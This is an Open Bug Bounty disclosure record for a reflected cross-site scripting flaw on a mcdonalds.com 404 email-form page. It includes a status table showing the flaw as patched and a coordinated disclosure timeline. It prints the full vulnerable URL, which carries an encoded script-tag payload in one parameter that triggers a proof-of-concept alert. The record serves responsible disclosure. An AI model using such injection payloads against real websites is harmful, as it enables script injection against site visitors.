mcdonalds.com XSS vulnerability

2016-10-21T14:09:00
ID OBB:187547
Type openbugbounty
Reporter Xany
Modified 2016-11-22T15:16:00

Description

Vulnerable URL:
https://www.mcdonalds.com/us/en/errors/404.emailform.html?hidSendEmail=no&hidPageTitle;=vega%C3%82%C2%A4tPageTitle=404%C3%82%C2%A4tPageUrl=http://www.mcdonalds.com/us/en/errors/404.html%C3%82%C2%A4tPagePath=1&newsPagePath;=1%22%20src=--%3E%3Cscript%3E%20alert(%27/OPENBUGBOUNTY/%27);%3C/script%3E%27%22&send;_to=1&your;_name=Joey&kaptcha;=1

Details:

Description| Value
---|---
Patched:| Yes, on 24.06.2017
Latest check for patch:| 24.06.2017 21:07 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 10635
VIP website status:| Yes
mcdonalds.com SSL connection:| Grade: A

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 21 October, 2016 14:09 GMT
Vulnerability existence verified and confirmed| 25 October, 2016 14:24 GMT
Generic security notifications sent to website owner| 25 October, 2016 14:24 GMT
Customized security notification sent to website owner| 25 October, 2016 14:24 GMT
Notification sent to subscribers (without technical details)| 25 October, 2016 18:17 GMT
Vulnerability details disclosed by researcher| 22 November, 2016 15:16 GMT